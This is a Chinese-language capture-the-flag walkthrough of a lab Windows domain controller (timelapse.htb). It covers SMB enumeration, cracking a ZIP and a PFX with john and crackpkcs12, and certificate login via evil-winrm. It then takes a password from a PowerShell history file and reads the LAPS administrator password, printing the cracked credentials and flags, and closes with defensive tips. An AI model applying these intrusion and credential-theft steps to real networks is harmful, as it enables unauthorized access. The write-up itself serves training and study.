Windows域渗透：从PFX凭据破解到LAPS密码提取权限提升

信息收集

初始扫描

目标IP: 10.10.11.152

使用Masscan进行快速端口扫描：

ip='10.10.11.152'; itf='tun0'
if nmap -sn "$ip" | grep -q "Host is up"; then
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
  if [ -n "$ports" ]; then
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
    nmap -Pn -sV -sC -p "$ports" "$ip"
  else
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
  fi
else
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi

开放端口和服务

• 53/tcp: DNS服务 (Simple DNS Plus)
• 88/tcp: Kerberos认证服务
• 135/tcp: MSRPC (Microsoft远程过程调用)
• 139/tcp: NetBIOS会话服务
• 389/tcp: LDAP (Active Directory目录服务)
• 445/tcp: SMB文件共享服务
• 464/tcp: Kerberos密码更改服务
• 593/tcp: RPC over HTTP
• 636/tcp: LDAP over SSL
• 3268/tcp: 全局目录LDAP
• 3269/tcp: 全局目录LDAP over SSL
• 5986/tcp: WinRM over HTTPS (远程管理)
• 9389/tcp: .NET消息框架
• 多个高端口RPC服务

关键发现：

• 域名为 timelapse.htb
• 域控制器主机名为 dc01.timelapse.htb

SMB枚举与文件获取

使用smbmap枚举共享：

smbmap -H 10.10.11.152 -R

使用smbclient获取文件：

smbclient //10.10.11.152/Shares
smb: \Dev\> get winrm_backup.zip
smb: \> mget HelpDesk/*

PFX证书破解与利用

破解ZIP密码

使用zip2john和john破解ZIP密码：

zip2john winrm_backup.zip > winrm_backup.jh
john winrm_backup.jh --wordlist=/path/to/rockyou.txt

获取密码：supremelegacy

破解PFX证书密码

从ZIP中提取PFX文件后，使用crackpkcs12破解：

crackpkcs12 -d /path/to/rockyou.txt legacyy_dev_auth.pfx -v

获取密码：thuglegacy

提取证书和私钥

# 提取私钥
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem -nodes

# 提取证书
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

使用证书进行认证

通过evil-winrm使用证书进行认证：

evil-winrm -i 10.10.11.152 -c cert.pem -k key.pem -S

成功获取user flag：eebd1dc880125fd0a4b8e357f05fab9d

权限提升：LAPS密码提取

获取svc_deploy凭据

检查PowerShell历史记录：

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

发现svc_deploy用户的密码：E3R$Q62^12p7PLlC%KWaxuaV

使用svc_deploy登录

evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

检查LAPS权限

发现svc_deploy是LAPS_Readers组成员，该组有权查看LAPS密码。

使用LAPS工具

1. 上传AdmPwd.PS模块：

upload AdmPwd.PS

2. 导入模块：

Import-Module C:\Users\svc_deploy\Documents\AdmPwd.PS\AdmPwd.PS.psd1

3. 检查扩展权限：

Find-AdmPwdExtendedRights -identity 'Domain Controllers' | select-object ExtendedRightHolders

确认LAPS_Readers组有权限查看Domain Controllers OU中的LAPS密码。

4. 获取域控制器列表：

Get-ADComputer -Filter * | Select-Object Name

5. 提取DC01的LAPS密码：

get-admpwdpassword -computername DC01 | Select password

获取管理员密码：e93R#e-YLBHsx$o9+5V#j;KJ

使用管理员凭据

evil-winrm -i 10.10.11.152 -u administrator -p 'e93R#e-YLBHsx$o9+5V#j;KJ' -S

成功获取root flag：61be406befa9e180081127cfbd845217

关键点总结

1. PFX证书利用：

   • 破解ZIP和PFX密码是初始访问的关键
   • 使用openssl提取证书和私钥
   • 通过证书认证绕过常规认证机制

2. LAPS权限提升：

   • 检查PowerShell历史记录获取敏感信息
   • LAPS_Readers组成员身份提供了特权提升途径
   • 使用AdmPwd.PS模块查询LAPS密码

3. 工具使用：

   • smbmap/smbclient用于SMB枚举
   • zip2john/john用于密码破解
   • evil-winrm用于远程管理
   • AdmPwd.PS用于LAPS密码提取

4. 防御建议：

   • 保护PFX证书文件，使用强密码
   • 限制LAPS_Readers组成员
   • 清理PowerShell历史记录
   • 监控异常证书认证行为